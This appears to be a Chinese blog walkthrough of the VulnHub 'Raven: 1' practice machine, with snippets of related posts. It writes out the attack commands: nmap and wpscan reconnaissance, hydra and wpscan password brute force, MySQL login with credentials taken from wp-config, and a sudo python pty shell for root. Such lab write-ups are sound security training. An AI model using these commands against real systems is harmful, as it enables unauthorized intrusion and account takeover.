vulnhub靶机raven1

原创 已于 2022-11-17 10:33:26 修改 · 851 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#vulnhub #网络安全

于 2022-11-17 09:33:50 首次发布
本文详细介绍了一次针对特定IP靶机的渗透测试过程,包括信息搜集、爆破尝试、数据库登录及权限提升等关键步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

靶机下载地址:Raven: 1 ~ VulnHub

Kali ip:192.168.174.128

靶机ip:192.168.174.131

实验思路:靶机ip发现,端口扫描,wordpress用户枚举和爆破,ssh爆破,MySQL登录,python提权

一、信息搜集

靶机ip发现:arp-scan -l

开放端口扫描

nmap -p- -sV -A 192.168.174.131

使用dirsearch脚本进行扫描

python dirsearch.py -u http://192.168.174.131

当然这里可以使用phpmail的漏洞,和raven一样

先修改host文件

sudo nano /etc/hosts

修改host后网站正常显示

二、尝试爆破

这里发现wordpress,尝试使用wpscan查看用户

wpscan --url http://192.168.174.131/wordpress/ -e u  

这里发现两个用户,把两个用户名写入username文本中,wpscan进行爆破

wpscan --url http://192.168.174.131/wordpress/ --usernames /home/ycx/Desktop/username --passwords /usr/share/wordlists/rockyou.txt

破解密码没有成功

尝试使用hydra进行ssh破解

hydra -L /home/ycx/Desktop/username -P /usr/share/wordlists/rockyou.txt ssh://192.168.174.131

这里的username是我把那两个用户的名字放到了文本当中

介绍两个参数:-v 输出详细信息 -f 破解出一个就停止破解

下面尝试ssh进行登录

在网站目录进行查看 发现flag2

和raven2一样的思路

三、数据库登录

这里查看wordpress下的wp-config文件,发现存在数据库的账号密码

define('DB_USER', 'root');

define('DB_PASSWORD', 'R@v3nSecurity');

操作数据库命令:

mysql -uroot -pR@v3nSecurity

show databases;

use wordpress

show tables;

select * from wp_users;

对这两个加密的密码尝试破解

这里切换到steven用户,开启交互式窗口

尝试sudo -l

sudo python -c 'import pty; pty.spawn("/bin/sh")'

python提权

这里成功提权

回过头去找flag1,在view-source:192.168.174.131/service.html可以看到

在post中发现flag3

到这里四个flag全都找到了

Vulnhub靶机之reven 1
2301_76227305的博客
06-09 832
这个靶机不算难,挺简单的,这些工具的使用也都是常见的。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
vulnhub】---Raven1靶机
qq_43168364的博客
08-26 976
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机Raven1靶机(192.168.15.172) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:arp-scan -l 命令:netdiscover -i eth0 -r 192.168.15.0/25 端口扫描 命令:masscan --rate=10000 --ports 0
[Vulnhub] Raven-1
weixin_63231007的博客
07-15 458
描述Raven是一个初级/中级boot2root机器。有四个flag可以找到和两种获取root的预期方式。使用VMware构建并在VirtualBox上进行测试。设置为使用NAT网络。信息搜集arp-scan-l进行主机发现靶机ipnmap-A192.168.236.139扫描一下靶机开放的端口及服务访问一下80端口,在services那个板块源码里发现了flag1。...
Vulnhub靶机渗透之 RAVEN: 1
_Co1a
07-30 2522
靶机下载地址:https://www.vulnhub.com/entry/raven-1,256/ Description Raven is a Beginner/Intermediate boot2root machine. There are four flags to find and two intended ways of getting root. Built with VMware and tested on Virtual Box. Set up to use NAT networki
Vulnhub靶机渗透:Raven1(超级详细)
Mysmycbx的博客
05-19 9379
发现有个contact.zip,下载下来解压,解压出contact.php,阅读源码。进入vendor文件夹,发现上面找到的phpmailer服务就存在这个文件夹里,翻找一下。在上面的内容中,我们获取到www-data权限,但通过扫描wordpress扫描到存在michael和steven两个用户,那能不能从这两个用户中,得到什么呢?下载下来一个试一试。找到了steven的用户凭据,但这里需要解密,使用john解密。,这里习惯性的使用ssh登录一下,结果成功了。扫描到后台,尝试弱密码登录,发现失败。
Vulnhub靶机Raven
prettyX的博客
04-05 711
靶机介绍 有4个flag,2种方法获取Root 靶机下载:https://download.vulnhub.com/raven/Raven.ova 开始 1靶机IP发现,本次靶机的IP为192.168.1.101 arp-scan -l
vulnhub靶机——raven: 2
09-03
- *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
vulnhub靶场【Raven系列】之1,必刷推荐,考察mysql udf提权
最新发布
China_I_LOVE的博客
01-15 1283
对于网站具有php文件,可进行模糊测试,可能具有隐藏参数最好通过burp代理进行每一步操作,这样可根据数据包分析可能的步骤对于php mailer漏洞的了解与利用,编号ssh爆破的使用对于解密操作,可通过john,这里是省事,采用网站识别的提权方式这里就是因为连接mysql的用户权限过于大,并且还可以写入和导出,所以采用udf提权对于sudo提权的了解。
Vulnhub_Raven2靶场渗透
weixin_73173934的博客
11-16 673
下载后用虚拟机打开,网络选择NAT模式。
vulnhub靶场,Raven1
kukudeshuo的博客
08-08 690
vulnhub靶场,Raven1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/raven-1,256/ 攻击机:kali(192.168.109.128) 靶机Raven2(192.168.109.152) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标目标靶机 确定目标靶机IP地址为192.168.109.152 使用nmap扫描查看目标靶机端口开放情况
渗透测试靶机----Raven-1
久恙502的博客
04-05 508
渗透测试,打靶经历记录,大佬多多指点,谢谢!!!
Vulnhub系列:Raven 1
Ays.Ie的博客
03-07 616
该篇为Vulnhub系列靶机Raven 1
vulnhub吧唧——RAVEN: 1
xstlikeja的博客
07-14 260
我们利用MySQL的udf提权后修改find的权限为root,然后在find目录下启动一个新的shell,此时就具有root权限,在MySQL中仅仅是一个单向的shell,并不能进行交互,所以我们需要进一步提升shell,此时我们在find的shell下可以更改root的密码然后登录他的ssh,至此,这台吧唧我们已经拿到了最高的权限——root。我们发现Michael的密码并不能破解,但Steven的密码破解出来是pink84,我们现在拿到了一个账号和他对应的密码,但是他是哪儿的账号和密码呢。
Vulnhub 靶机--Raven
Beret-81的博客
06-13 431
Vulnhub 靶机--Raven1、信息收集2、获取shell3、提权 1、信息收集 在这里发现了一个PHPmailer 存在命令执行漏洞 2、获取shell 在GitHub 找了一个exp,修改目标IP、目录、端口后,执行脚本 访问http://172.16.200.166/contact.php,此时就会生成后门文件shell.php kali开启监听,然后访问:http://172.16.200.166/shell.php 获取shell: 3、提权 在主机信息收集中获取mysql 账
靶场练习第二十四天~vulnhub靶场之Raven-1
qq_57976347的博客
02-22 1596
一、准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Raven: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)扫描靶机开放的端口及其服务 nmap -A 192.168.101.127 2.网站的信息收集 (1靶机开放了80端口,先访问靶机网站看看有什么有用的信息 1.访问到http://
OSCP - Raven: 1 的破解
kevinhanser
04-14 1675
本文主要记录对 Raven: 1 的渗透学习过程,测试的 VM 主机主要来源 www.vulnhub.com 博客集:面向 CTF 的 VM 破解系列 下载链接:Raven: 1 VM - Raven: 1 的破解 2019年4月14日10:58:06【原创】 1. 官方描述 Name: Raven: 1 名字:Raven: 1 Date release: 14 Aug 2018 发布日期:...
Vulnhub-Raven1 靶机练习
GloryGod的博客
08-20 245
进行端口扫描,记录有用信息,有22,80,111等端口开放着手从简入繁,首先对80端口进行渗透信息收集,目录扫描等方式可知 wordpress,并存在 phpmailer服务,可以进行漏洞利用getshell方法利用 phpmailer 服务的exp利用wpscan获取用户名,再利用 hydra 进行密码爆破,随网站登录失败,但可ssh登录getshell一个用户之后,利用数据库信息,getshell另一个用户提权方法利用数据库进行 UDF 提权。
全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(二)raven1
hyjcking的博客
11-22 1479
接下来使用kali的dirb爆破目录,发现了wordpress目录,说明网站使用了wordpress建站,所以我们一会可以使用wordpress的克星wpscan来扫描。扫描到两个用户名,steven和michael,接下来我们使用hydra对michael用户的ssh密码进行爆破,这里我们使用rockyou.txt字典。尝试了一下sudo提权,发现需要密码,切换目录并查看,命令:cd /var/www/html/wordpress。嘿嘿 提权成功,然后找到flag2.txt,成功拿下这台靶机
解除CSDN强制关注才可阅读文章的限制
兮动人
07-05 7366
解除CSDN强制关注才可阅读文章的限制
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值